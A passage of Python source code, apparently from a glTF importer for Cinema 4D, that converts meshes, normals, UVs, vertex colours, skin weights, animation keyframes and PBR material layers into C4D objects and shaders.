= float2bytes(component[c])\n\n normal_buffer[normal_tag.GetDataSize() * polygon + v * vector_size + c * component_size + 0] = chr(low_byte)\n normal_buffer[normal_tag.GetDataSize() * polygon + v * vector_size + c * component_size + 1] = chr(high_byte)\n\n def parse_normals():\n normal = []\n if 'NORMAL' in prim.attributes:\n normal = BinaryData.get_data_from_accessor(gltf, prim.attributes['NORMAL'])\n\n if normal:\n normaltag = c4d.NormalTag(nb_poly)\n for polyidx in range(nb_poly):\n poly = c4d_mesh.GetPolygon(polyidx)\n normal_a = self.switch_handedness_v3(self.list_to_vec3(normal[poly.a]))\n normal_b = self.switch_handedness_v3(self.list_to_vec3(normal[poly.b]))\n normal_c = self.switch_handedness_v3(self.list_to_vec3(normal[poly.c]))\n normal_d = c4d.Vector(0.0, 0.0, 0.0)\n\n set_normals(normaltag, polyidx, normal_a, normal_b, normal_c, normal_d)\n\n c4d_mesh.InsertTag(normaltag)\n\n # A Phong tag is needed to make C4D use the Normal Tag (seems to be done for Collada)\n phong = c4d.BaseTag(5612)\n c4d_mesh.InsertTag(phong)\n\n def parse_texcoords(index, c4d_mesh):\n texcoord_key = 'TEXCOORD_{}'.format(index)\n if texcoord_key in prim.attributes:\n uvs = BinaryData.get_data_from_accessor(gltf, prim.attributes[texcoord_key])\n\n if uvs:\n uvtag = c4d.UVWTag(nb_poly)\n uvtag.SetName(texcoord_key)\n for i in range(0, nb_poly):\n poly = c4d_mesh.GetPolygon(i)\n aa = (uvs[poly.a][0], uvs[poly.a][1], 0.0)\n bb = (uvs[poly.b][0], uvs[poly.b][1], 0.0)\n cc = (uvs[poly.c][0], uvs[poly.c][1], 0.0)\n uvtag.SetSlow(i, aa, bb, cc, (0.0, 0.0, 0.0))\n\n c4d_mesh.InsertTag(uvtag)\n\n def parse_vertex_colors(index, c4d_mesh):\n colors = []\n color_key = 'COLOR_{}'.format(index)\n colortag = None\n if color_key in prim.attributes:\n colors = BinaryData.get_data_from_accessor(gltf, prim.attributes[color_key])\n if colors:\n nb_verts = len(verts)\n colortag = c4d.VertexColorTag(nb_verts)\n colortag.SetPerPointMode(True)\n colortag.SetName(color_key)\n vtx_color_data = colortag.GetDataAddressW()\n\n has_alpha = len(colors[0]) > 3\n for i in range(nb_verts):\n c4d.VertexColorTag.SetPoint(vtx_color_data, None, None, i, c4d.Vector4d(colors[i][0], colors[i][1], colors[i][2], colors[i][3] if has_alpha else 1.0))\n\n c4d_mesh.InsertTag(colortag)\n\n self.has_vertex_colors = True\n\n return colortag\n\n def parse_tangents():\n tangent = []\n if 'TANGENT' in prim.attributes:\n tangent = BinaryData.get_data_from_accessor(gltf, prim.attributes['TANGENT'])\n if tangent:\n 
tangentTag = c4d.TangentTag(nb_poly)\n for polyidx in range(0, nb_poly):\n poly = c4d_mesh.GetPolygon(polyidx)\n normal_a = self.switch_handedness_v3(self.list_to_vec3(tangent[poly.a]))\n normal_b = self.switch_handedness_v3(self.list_to_vec3(tangent[poly.b]))\n normal_c = self.switch_handedness_v3(self.list_to_vec3(tangent[poly.c]))\n normal_d = c4d.Vector(0.0, 0.0, 0.0)\n\n set_normals(tangentTag, polyidx, normal_a, normal_b, normal_c, normal_d)\n\n c4d_mesh.InsertTag(tangentTag)\n\n vertex = BinaryData.get_data_from_accessor(gltf, prim.attributes['POSITION'])\n nb_vertices = len(vertex)\n\n # Vertices are stored under the form # [(1.0, 0.0, 0.0), (0.0, 0.0, 0.0) ...]\n verts = []\n for i in range(len(vertex)):\n vect = c4d.Vector(vertex[i][0], vertex[i][1], vertex[i][2])\n verts.append(self.switch_handedness_v3(vect))\n\n indices = BinaryData.get_data_from_accessor(gltf, prim.indices)\n nb_poly = len(indices) / 3\n\n c4d_mesh = c4d.PolygonObject(nb_vertices, nb_poly)\n c4d_mesh.SetAllPoints(verts)\n\n # Indices are stored like [(0,), (1,), (2,)]\n current_poly = 0\n try:\n for i in range(0, len(indices), 3):\n poly = c4d.CPolygon(indices[i + 2][0], indices[i + 1][0], indices[i][0]) # indice list is like [(0,), (1,), (2,)]\n c4d_mesh.SetPolygon(current_poly, poly)\n current_poly += 1\n except:\n self.has_problematic_polygons = True\n return None # Avoid crash from Sketchup because of wrong geometry\n\n parse_normals()\n\n # TANGENTS (Commented for now, \"Tag not in sync\" error popup in c4d)\n # parse_tangents()\n\n for texcoord_index in range(10):\n parse_texcoords(texcoord_index, c4d_mesh)\n\n if prim.material is not None:\n \n mat = materials[prim.material]\n\n # Only parse COLORS_0\n colortag = parse_vertex_colors(0, c4d_mesh)\n\n # Enable vertex colors\n self.make_vertex_colors_layer(mat, colortag)\n\n if not gltf.data.materials[prim.material].double_sided:\n mat.SetParameter(c4d.TEXTURETAG_SIDE, c4d.SIDE_FRONT, c4d.DESCFLAGS_SET_NONE)\n\n mattag = c4d.TextureTag()\n mattag.SetParameter(c4d.TEXTURETAG_MATERIAL, mat, c4d.DESCFLAGS_SET_NONE)\n mattag.SetParameter(c4d.TEXTURETAG_PROJECTION, c4d.TEXTURETAG_PROJECTION_UVW, c4d.DESCFLAGS_GET_NONE)\n c4d_mesh.InsertTag(mattag)\n\n c4d_mesh.SetDirty(c4d.DIRTYFLAGS_ALL)\n\n return c4d_mesh\n\n def convert_mesh(self, gltf, mesh_index, materials):\n gltf_mesh = gltf.data.meshes[mesh_index]\n\n if len(gltf_mesh.primitives) == 1:\n return self.convert_primitive(gltf_mesh.primitives[0], gltf, materials)\n else:\n c4d_object = c4d.BaseObject(c4d.Onull)\n for prim in gltf_mesh.primitives:\n c4d_mesh = self.convert_primitive(prim, gltf, materials)\n c4d_mesh.InsertUnder(c4d_object)\n return c4d_object\n\n def create_c4d_hierarchy(self, gltf, nodes, skins):\n\n # Ignore transforms for skinned meshes\n mesh_nodes_idx = [n for n in range(len(gltf.data.nodes)) if gltf.data.nodes[n].mesh is not None and gltf.data.nodes[n].skin is not None]\n\n # Add GlTF root objects to document\n for node in gltf.data.scenes[0].nodes:\n c4d.documents.GetActiveDocument().InsertObject(nodes[node])\n \n # Do the parenting\n for n in nodes:\n if nodes[n] is not None:\n # Insert the children under their respective parents\n if gltf.data.nodes[int(n)].children:\n for child in gltf.data.nodes[int(n)].children:\n if nodes[child] is not None:\n if child not in mesh_nodes_idx:\n c4d.documents.GetActiveDocument().InsertObject(nodes[child], parent=nodes[n])\n else:\n # If skinned, assign to the root\n c4d.documents.GetActiveDocument().InsertObject(nodes[child])\n\n # Apply 
changes\n c4d.documents.GetActiveDocument().SetChanged()\n\n #############################\n # SKINNING AND ANIMATIONS\n #############################\n\n def parse_gltf_skins(self, gltf):\n skins = {}\n for nodeidx in range(len(gltf.data.nodes)):\n gltf_node = gltf.data.nodes[nodeidx]\n if hasattr(gltf_node, \"skin\") and gltf_node.skin is not None:\n if gltf_node.skin not in skins:\n skin = Skin(gltf, gltf_node.skin, gltf_node.mesh, nodeidx)\n skins[gltf_node.skin] = skin\n else:\n skins[gltf_node.skin].mesh_idx.append(gltf_node.mesh)\n skins[gltf_node.skin].node_idx.append(nodeidx)\n return skins\n\n def create_c4d_weights(self, gltf, nodes, skins):\n\n initial_transforms = {}\n\n # create the weights and bind them to joints\n for i in skins:\n\n skin = skins[i]\n \n for iNode, iMesh in zip(skin.node_idx, skin.mesh_idx):\n\n c4d_obj = nodes[iNode]\n gltf_mesh = gltf.data.meshes[iMesh]\n\n # Create the skin object\n c4d_skin = c4d.BaseObject(c4d.Oskin)\n c4d.documents.GetActiveDocument().InsertObject(c4d_skin, parent=c4d_obj)\n\n # Read in the data\n for prim in gltf_mesh.primitives:\n\n # Create the C4D tag\n tag = CAWeightTag()\n c4d_obj.InsertTag(tag) \n\n # Accessor data\n weights = BinaryData.get_data_from_accessor(gltf, prim.attributes[\"WEIGHTS_0\"]) if \"WEIGHTS_0\" in prim.attributes else []\n joints = BinaryData.get_data_from_accessor(gltf, prim.attributes[\"JOINTS_0\"]) if \"JOINTS_0\" in prim.attributes else []\n \n # Unique list of joints used for the skinning\n local_joints = list(set([j for sub in joints for j in sub]))\n\n # Add the joints\n c4d_joints = []\n c4d_ibms = []\n gltf_to_c4d = {}\n for idx in local_joints:\n\n ibm = skin.IBMs[idx]\n ind = skin.joints[idx]\n joint = nodes[ind]\n gltf_to_c4d[ind] = tag.AddJoint(joint)\n \n c4d_ibms.append(ibm)\n c4d_joints.append(joint)\n\n # Set weights according to the version\n for vert_idx in range(len(weights)):\n for influence_idx in range(len(weights[0])):\n weight = weights[vert_idx][influence_idx]\n if weight > 0:\n tag.SetWeight(\n gltf_to_c4d[ skin.joints[joints[vert_idx][influence_idx] ]], \n vert_idx, \n weight\n )\n\n # Add the IBM\n for joint, M in zip(c4d_joints, c4d_ibms):\n\n if joint.GetName() not in initial_transforms:\n initial_transforms[joint.GetName()] = joint.GetMl()\n \n # Read the IBM\n if M is not None:\n c4d_mat = self.gltf_matrix_to_c4d(M)\n joint.SetMg(c4d_mat.__invert__())\n\n # Bind in C4D\n doc = c4d.documents.GetActiveDocument()\n doc.SetActiveTag(tag, mode=c4d.SELECTION_NEW)\n c4d.CallButton(tag, c4d.ID_CA_WEIGHT_TAG_SET)\n \n # Restore the inital position\n for jt in skin.joints:\n joint = nodes[jt]\n name = joint.GetName()\n if name in initial_transforms:\n joint.SetMl(initial_transforms[name])\n\n def import_animations(self, gltf, nodes):\n\n if gltf.data.animations is None:\n return\n\n nAnimations = len(gltf.data.animations)\n\n CHANNELS = {}\n\n # Values which... 
just work\n eps = 1.e-3 # Minimal time between distinct frames\n margin = 1.e-2 # Offset between animations\n\n # Read the animation data into CHANNELS\n for anim_idx, animation in enumerate(gltf.data.animations):\n for channel in animation.channels:\n\n # Parse the glTF data\n node_idx = channel.target.node\n path = channel.target.path\n ID = \"%d_%s\" % (node_idx, path)\n\n # Create the channel\n if ID not in CHANNELS:\n CHANNELS[ID] = {}\n CHANNELS[ID][\"time\"] = [[] for i in range(nAnimations)]\n CHANNELS[ID][\"data\"] = [[] for i in range(nAnimations)]\n CHANNELS[ID][\"fixed\"] = [0 for i in range(nAnimations)]\n CHANNELS[ID][\"path\"] = path\n CHANNELS[ID][\"node\"] = node_idx\n else:\n if len(CHANNELS[ID][\"time\"][anim_idx]):\n print(\"Skipped a duplicate animation channel\")\n continue\n\n # Read the buffers\n sampler = animation.samplers[channel.sampler]\n in_data = BinaryData.get_data_from_accessor(gltf, sampler.input)\n in_data = [t[0] for t in in_data]\n out_data = BinaryData.get_data_from_accessor(gltf, sampler.output)\n\n # Sort the keyframes\n in_data, out_data = (list(t) for t in zip(*sorted(zip(in_data, out_data))))\n\n # Remove duplicates\n oldt = -1e8\n cpt = 0\n idx_to_remove = []\n for i,o in zip(in_data, out_data):\n if i-oldt < eps:\n idx_to_remove.append(cpt)\n cpt+=1\n oldt = i\n for idx in idx_to_remove[::-1]:\n in_data.pop(idx)\n out_data.pop(idx)\n\n CHANNELS[ID][\"time\"][anim_idx] = in_data\n CHANNELS[ID][\"data\"][anim_idx] = out_data\n\n\n # Offset the animations to make them sequential\n ranges = [{\"start\": 1e8, \"end\":-1e8} for a in gltf.data.animations]\n animationStart = 0\n for i in range(nAnimations):\n # Compute the animation range\n for ID in CHANNELS:\n if len(CHANNELS[ID][\"time\"][i]): # Is active for this anim\n ranges[i][\"start\"] = min(CHANNELS[ID][\"time\"][i][0], ranges[i][\"start\"])\n ranges[i][\"end\"] = max(CHANNELS[ID][\"time\"][i][-1], ranges[i][\"end\"])\n # Offset the time values\n for ID in CHANNELS:\n if len(CHANNELS[ID][\"time\"][i]):\n CHANNELS[ID][\"time\"][i] = [t + animationStart - ranges[i][\"start\"] for t in CHANNELS[ID][\"time\"][i]]\n # Update the starting point of the next animation and the new ranges\n ranges[i][\"start\"] += animationStart\n ranges[i][\"end\"] += animationStart\n animationStart += margin + ranges[i][\"end\"] - ranges[i][\"start\"]\n \n # Remember the static positions of the nodes concerned by the keyframed channels\n for ID in CHANNELS:\n node_idx = CHANNELS[ID][\"node\"]\n path = CHANNELS[ID][\"path\"]\n \n c4d_object = nodes[node_idx]\n CHANNELS[ID][\"rest_data\"] = None\n if path == \"translation\":\n CHANNELS[ID][\"rest_data\"] = c4d_object.GetRelPos()\n elif path == \"scale\":\n CHANNELS[ID][\"rest_data\"] = c4d_object.GetRelScale()\n elif path == \"rotation\":\n CHANNELS[ID][\"rest_data\"] = c4d_object.GetRelRot()\n\n # Add keyframes to fix the extrapolation due to the sequential trick\n for i in range(nAnimations):\n for ID in CHANNELS:\n c = CHANNELS[ID]\n if not len(c[\"time\"][i]): # Empty channel -> we fix it to the rest position\n c[\"time\"][i] = [ranges[i][\"start\"] + eps, ranges[i][\"end\"] - eps]\n c[\"data\"][i] = [c[\"rest_data\"], c[\"rest_data\"]] \n c[\"fixed\"][i] = 1\n\n else:\n # MIN\n t, d = c[\"time\"][i][0], c[\"data\"][i][0]\n if t > ranges[i][\"start\"] + eps:\n c[\"time\"][i].insert(0, ranges[i][\"start\"] + eps)\n c[\"data\"][i].insert(0, d)\n # MAX\n t, d = c[\"time\"][i][-1], c[\"data\"][i][-1]\n if t < ranges[i][\"end\"] - eps:\n 
c[\"time\"][i].append(ranges[i][\"end\"] - eps)\n c[\"data\"][i].append(d)\n\n # Add the keyframes\n for ani in range(nAnimations):\n for ID in CHANNELS:\n\n channel = CHANNELS[ID]\n\n # Read in the dict data\n path = channel[\"path\"]\n node_idx = channel[\"node\"]\n in_data = channel[\"time\"][ani]\n out_data = channel[\"data\"][ani]\n\n # Generate and get the C4D animation data\n # Create the track types\n trackType = None\n if path == \"translation\":\n trackType = c4d.ID_BASEOBJECT_REL_POSITION\n elif path == \"scale\":\n trackType = c4d.ID_BASEOBJECT_REL_SCALE\n elif path == \"rotation\":\n trackType = c4d.ID_BASEOBJECT_REL_ROTATION\n else:\n # This channel is linked to morphing, not supported for the moment\n self.has_morphing = True\n continue\n\n # Get the C4D object\n c4d_object = nodes[node_idx]\n\n # Get the tracks and curves\n tracks = []\n for axis in [c4d.VECTOR_X, c4d.VECTOR_Y, c4d.VECTOR_Z]:\n\n descid = c4d.DescID(\n c4d.DescLevel(trackType, c4d.DTYPE_VECTOR,0), \n c4d.DescLevel(axis, c4d.DTYPE_REAL,0)\n )\n descid = [trackType, axis]\n\n track = c4d_object.FindCTrack(descid)\n\n if track is None:\n track = c4d.CTrack(c4d_object, descid)\n c4d_object.InsertTrackSorted(track)\n\n tracks.append(track)\n\n # Get the F-Curves\n curves = [track.GetCurve() for track in tracks]\n\n # Create the keyframes\n for i,o in zip(in_data, out_data):\n \n data = None\n if channel[\"fixed\"][ani]:\n # Animation data for \"fixed\" keyframes\n data = o\n else:\n # Normal keyframes\n if path == \"rotation\":\n data = self.quat_to_eulerxyz(o)\n data = [data[0], data[1], -data[2]]\n elif path == \"translation\":\n data = c4d.Vector(o[0], o[1], -o[2])\n elif path == \"scale\":\n data = c4d.Vector(o[0], o[1], o[2])\n else:\n print(\"We don't support morph targets for now...\")\n\n # Get the time\n mytime = c4d.BaseTime(i)\n # Create a keyframe\n for j in range(3):\n key = c4d.CKey()\n key.SetTime(curves[j], mytime)\n key.SetValue(curves[j], data[j])\n curves[j].InsertKey(key)\n key.SetInterpolation(curves[j], c4d.CINTERPOLATION_LINEAR)\n key.SetQuatInterpolation(curves[j], c4d.ROTATIONINTERPOLATION_QUATERNION_SLERP)\n \n\n # Update\n c4d_object.Message(c4d.MSG_UPDATE)\n self.progress_callback(\"Importing animations\", anim_idx + 1, len(gltf.data.animations))\n\n # Add markers\n for ani in range(nAnimations):\n t = c4d.BaseTime(ranges[ani][\"start\"])\n c4d.documents.AddMarker(c4d.documents.GetActiveDocument(), pPred=None, time=t, name = gltf.data.animations[ani].name + \"_begin\")\n t = c4d.BaseTime(ranges[ani][\"end\"])\n c4d.documents.AddMarker(c4d.documents.GetActiveDocument(), pPred=None, time=t, name = gltf.data.animations[ani].name + \"_end\")\n\n c4d.EventAdd()\n\n #############################\n # MATERIALS\n #############################\n\n COLOR_BLACK = c4d.Vector(0.0, 0.0, 0.0)\n COLOR_WHITE = c4d.Vector(1.0, 1.0, 1.0)\n\n def get_texture_path(self):\n return os.path.join(os.path.split(c4d.documents.GetActiveDocument().GetParameter(c4d.DOCUMENT_FILEPATH, c4d.DESCFLAGS_GET_NONE))[0], 'tex')\n\n def setGradient(self, colorizer, low, high):\n gradient = colorizer.GetParameter(c4d.SLA_COLORIZER_GRADIENT, c4d.DESCFLAGS_SET_NONE)\n gradient.FlushKnots()\n gradient.InsertKnot(low, 1.0, 0, 0.5, 0)\n gradient.InsertKnot(high, 1.0, 1, 0, 1)\n colorizer.SetParameter(c4d.SLA_COLORIZER_GRADIENT, gradient, c4d.DESCFLAGS_SET_NONE)\n\n def setGradientBlackWhite(self, colorizer):\n self.setGradient(colorizer, self.COLOR_BLACK, self.COLOR_WHITE)\n\n def setGradientInvert(self, colorizer):\n 
self.setGradient(colorizer, self.COLOR_WHITE, self.COLOR_BLACK)\n\n def make_specular_diffuse(self, spec_gloss, mat):\n mat[c4d.MATERIAL_USE_COLOR] = True\n if 'diffuseTexture' not in spec_gloss:\n return\n\n diffusetexshader = self.gltf_textures[spec_gloss['diffuseTexture']['index']].to_c4d_shader()\n mat.SetParameter(c4d.MATERIAL_COLOR_SHADER, diffusetexshader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(diffusetexshader)\n\n def make_vertex_colors_layer(self, mat, colortag):\n vtxcolorshader = c4d.BaseShader(1011137)\n vtxcolorshader.SetParameter(c4d.SLA_DIRTY_VMAP_OBJECT, colortag, c4d.DESCFLAGS_GET_NONE)\n\n if not mat.GetParameter(c4d.MATERIAL_COLOR_SHADER, c4d.DESCFLAGS_SET_NONE):\n mat.SetParameter(c4d.MATERIAL_COLOR_SHADER, vtxcolorshader, c4d.DESCFLAGS_SET_NONE)\n\n # check if vertex color already enabled:\n if not colortag or mat.GetReflectionLayerIndex(0).GetName() == 'Vertex Colors':\n return\n\n vtx_color_diffuse = mat.AddReflectionLayer()\n vtx_color_diffuse.SetFlags(c4d.REFLECTION_FLAG_NONE)\n vtx_color_diffuse.SetName(\"Vertex Colors\")\n vtxcolorid = vtx_color_diffuse.GetDataID()\n mat.SetParameter(vtxcolorid + c4d.REFLECTION_LAYER_ENABLED, False, c4d.DESCFLAGS_SET_NONE)\n\n refid = vtxcolorid + c4d.REFLECTION_LAYER_MAIN_DISTRIBUTION\n mat.SetParameter(refid, c4d.REFLECTION_DISTRIBUTION_LAMBERTIAN, c4d.DESCFLAGS_SET_NONE)\n mat.SetParameter(vtxcolorid + c4d.REFLECTION_LAYER_COLOR_TEXTURE, vtxcolorshader, c4d.DESCFLAGS_SET_NONE)\n\n mat.InsertShader(vtxcolorshader)\n\n def make_diffuse_layer(self, pbr_metal, mat):\n # Diffuse: set lambert + baseColor in color + inverted metal in LayerMask\n diffuse = mat.AddReflectionLayer()\n diffuse.SetName(\"BaseColor\")\n diffuseid = diffuse.GetDataID()\n\n # To lambert\n refid = diffuseid + c4d.REFLECTION_LAYER_MAIN_DISTRIBUTION\n mat.SetParameter(refid, c4d.REFLECTION_DISTRIBUTION_LAMBERTIAN, c4d.DESCFLAGS_SET_NONE)\n\n if pbr_metal.base_color_factor:\n base_color_factor = pbr_metal.base_color_factor\n base_color = c4d.Vector(base_color_factor[0], base_color_factor[1], base_color_factor[2])\n mat.SetParameter(diffuseid + c4d.REFLECTION_LAYER_COLOR_COLOR, base_color, c4d.DESCFLAGS_SET_NONE)\n\n # Set base color texture\n if pbr_metal.base_color_texture:\n basecolortexshader = self.gltf_textures[pbr_metal.base_color_texture.index].to_c4d_shader()\n mat.SetParameter(diffuseid + c4d.REFLECTION_LAYER_COLOR_TEXTURE, basecolortexshader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(basecolortexshader)\n\n # Add inverter colorizer and set metalness texture\n if pbr_metal.metallic_roughness_texture:\n metaltexshader = self.gltf_textures[pbr_metal.metallic_roughness_texture.index].to_c4d_shader()\n\n colorizer = c4d.BaseShader(c4d.Xcolorizer)\n colorizer.SetParameter(c4d.SLA_COLORIZER_TEXTURE, metaltexshader, c4d.DESCFLAGS_SET_NONE)\n colorizer.InsertShader(metaltexshader)\n colorizer.SetParameter(c4d.SLA_COLORIZER_INPUT, c4d.SLA_COLORIZER_INPUT_BLUE, c4d.DESCFLAGS_SET_NONE)\n self.setGradientInvert(colorizer)\n mat.SetParameter(diffuseid + c4d.REFLECTION_LAYER_TRANS_TEXTURE, colorizer, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(colorizer)\n\n # Report metallic factor\n metallic_factor = pbr_metal.metallic_factor if pbr_metal.metallic_factor is not None else 1.0\n mat.SetParameter(diffuseid + c4d.REFLECTION_LAYER_TRANS_MIX_STRENGTH, metallic_factor, c4d.DESCFLAGS_SET_NONE)\n\n def makeTextureShader(self, filepath, alpha_only=False):\n sha = c4d.BaseList2D(c4d.Xbitmap)\n sha[c4d.BITMAPSHADER_FILENAME] = filepath\n if alpha_only:\n ls = 
c4d.LayerSet()\n ls.SetMode(c4d.LAYERSETMODE_LAYERALPHA)\n sha[c4d.BITMAPSHADER_LAYERSET] = ls\n\n return sha\n\n def make_specular_layer(self, spec_gloss, mat):\n reflect = mat.AddReflectionLayer()\n reflect.SetName(\"Reflectance_specular\")\n reflectid = reflect.GetDataID()\n\n if 'specularFactor' in spec_gloss:\n spec = spec_gloss['specularFactor']\n specularColor = c4d.Vector(spec[0], spec[1], spec[2])\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_COLOR_COLOR, specularColor, c4d.DESCFLAGS_SET_NONE)\n\n if 'specularGlossinessTexture' in spec_gloss:\n speculartexshader = self.gltf_textures[spec_gloss['specularGlossinessTexture']['index']].to_c4d_shader()\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_DISTRIBUTION, c4d.REFLECTION_DISTRIBUTION_GGX, c4d.DESCFLAGS_SET_NONE)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_COLOR_TEXTURE, speculartexshader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(speculartexshader)\n\n glossinesstexshader = self.gltf_textures[spec_gloss['specularGlossinessTexture']['index']].to_c4d_shader(True)\n gloss_colorizer = c4d.BaseShader(c4d.Xcolorizer)\n gloss_colorizer.SetParameter(c4d.SLA_COLORIZER_INPUT, c4d.SLA_COLORIZER_INPUT_LUMINANCE, c4d.DESCFLAGS_SET_NONE)\n gloss_colorizer.SetParameter(c4d.SLA_COLORIZER_TEXTURE, glossinesstexshader, c4d.DESCFLAGS_SET_NONE)\n gloss_colorizer.InsertShader(glossinesstexshader)\n self.setGradientInvert(gloss_colorizer)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_SHADER_ROUGHNESS, gloss_colorizer, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(gloss_colorizer)\n\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_VALUE_ROUGHNESS, spec_gloss.get('glossinessFactor', 1.0), c4d.DESCFLAGS_SET_NONE)\n\n def make_metallic_reflectance_layer(self, pbr_metal, mat):\n reflect = mat.AddReflectionLayer()\n reflect.SetName(\"Reflectance_metal\")\n reflectid = reflect.GetDataID()\n\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_FRESNEL_MODE, c4d.REFLECTION_FRESNEL_CONDUCTOR, c4d.DESCFLAGS_SET_NONE)\n\n if pbr_metal.base_color_factor:\n base_color_factor = pbr_metal.base_color_factor\n base_color = c4d.Vector(base_color_factor[0], base_color_factor[1], base_color_factor[2])\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_COLOR_COLOR, base_color, c4d.DESCFLAGS_SET_NONE)\n\n if pbr_metal.base_color_texture:\n basecolortexshader = self.gltf_textures[pbr_metal.base_color_texture.index].to_c4d_shader()\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_DISTRIBUTION, c4d.REFLECTION_DISTRIBUTION_GGX, c4d.DESCFLAGS_SET_NONE)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_COLOR_TEXTURE, basecolortexshader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(basecolortexshader)\n\n metallic_factor = pbr_metal.metallic_factor if pbr_metal.metallic_factor is not None else 1.0\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_TRANS_BRIGHTNESS, metallic_factor, c4d.DESCFLAGS_SET_NONE)\n\n roughness_factor = pbr_metal.roughness_factor if pbr_metal.roughness_factor is not None else 1.0\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_VALUE_ROUGHNESS, roughness_factor, c4d.DESCFLAGS_SET_NONE)\n\n if pbr_metal.metallic_roughness_texture:\n # Metalness\n metalnesstexshader = self.gltf_textures[pbr_metal.metallic_roughness_texture.index].to_c4d_shader()\n metal_colorizer = c4d.BaseShader(c4d.Xcolorizer)\n metal_colorizer.SetParameter(c4d.SLA_COLORIZER_INPUT, c4d.SLA_COLORIZER_INPUT_BLUE, c4d.DESCFLAGS_SET_NONE)\n metal_colorizer.SetParameter(c4d.SLA_COLORIZER_TEXTURE, metalnesstexshader, 
c4d.DESCFLAGS_SET_NONE)\n metal_colorizer.InsertShader(metalnesstexshader)\n self.setGradientBlackWhite(metal_colorizer)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_TRANS_TEXTURE, metal_colorizer, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(metal_colorizer)\n\n # Roughness\n roughnesstexshader = self.gltf_textures[pbr_metal.metallic_roughness_texture.index].to_c4d_shader()\n rough_colorizer = c4d.BaseShader(c4d.Xcolorizer)\n rough_colorizer.SetParameter(c4d.SLA_COLORIZER_INPUT, c4d.SLA_COLORIZER_INPUT_GREEN, c4d.DESCFLAGS_SET_NONE)\n rough_colorizer.SetParameter(c4d.SLA_COLORIZER_TEXTURE, roughnesstexshader, c4d.DESCFLAGS_SET_NONE)\n rough_colorizer.InsertShader(roughnesstexshader)\n self.setGradientBlackWhite(rough_colorizer)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_SHADER_ROUGHNESS, rough_colorizer, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(rough_colorizer)\n\n def make_dielectric_reflectance_layer(self, pbr_metal, mat):\n reflect = mat.AddReflectionLayer()\n reflect.SetName(\"Reflectance_dielectric\")\n reflectid = reflect.GetDataID()\n\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_FRESNEL_MODE, c4d.REFLECTION_FRESNEL_DIELECTRIC, c4d.DESCFLAGS_SET_NONE)\n\n if pbr_metal.base_color_factor:\n base_color_factor = pbr_metal.base_color_factor\n base_color = c4d.Vector(base_color_factor[0], base_color_factor[1], base_color_factor[2])\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_COLOR_COLOR, base_color, c4d.DESCFLAGS_SET_NONE)\n\n if pbr_metal.base_color_texture:\n basecolortexshader = self.gltf_textures[pbr_metal.base_color_texture.index].to_c4d_shader()\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_DISTRIBUTION, c4d.REFLECTION_DISTRIBUTION_GGX, c4d.DESCFLAGS_SET_NONE)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_COLOR_TEXTURE, basecolortexshader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(basecolortexshader)\n\n if pbr_metal.metallic_roughness_texture:\n # Roughness\n roughnesstexshader = self.gltf_textures[pbr_metal.metallic_roughness_texture.index].to_c4d_shader()\n rough_colorizer = c4d.BaseShader(c4d.Xcolorizer)\n rough_colorizer.SetParameter(c4d.SLA_COLORIZER_INPUT, c4d.SLA_COLORIZER_INPUT_GREEN, c4d.DESCFLAGS_SET_NONE)\n rough_colorizer.SetParameter(c4d.SLA_COLORIZER_TEXTURE, roughnesstexshader, c4d.DESCFLAGS_SET_NONE)\n rough_colorizer.InsertShader(roughnesstexshader)\n self.setGradientBlackWhite(rough_colorizer)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_SHADER_ROUGHNESS, rough_colorizer, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(rough_colorizer)\n\n # Metalness\n metalnesstexshader = self.gltf_textures[pbr_metal.metallic_roughness_texture.index].to_c4d_shader()\n metal_colorizer = c4d.BaseShader(c4d.Xcolorizer)\n metal_colorizer.SetParameter(c4d.SLA_COLORIZER_INPUT, c4d.SLA_COLORIZER_INPUT_BLUE, c4d.DESCFLAGS_SET_NONE)\n metal_colorizer.SetParameter(c4d.SLA_COLORIZER_TEXTURE, metalnesstexshader, c4d.DESCFLAGS_SET_NONE)\n metal_colorizer.InsertShader(metalnesstexshader)\n self.setGradientInvert(metal_colorizer)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_TRANS_TEXTURE, metal_colorizer, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(metal_colorizer)\n\n roughness_factor = pbr_metal.roughness_factor if pbr_metal.roughness_factor is not None else 1.0\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_VALUE_ROUGHNESS, roughness_factor, c4d.DESCFLAGS_SET_NONE)\n\n def set_normal_map(self, material, mat):\n if not material.normal_texture:\n return\n\n mat[c4d.MATERIAL_USE_NORMAL] = 1\n normaltexshader = 
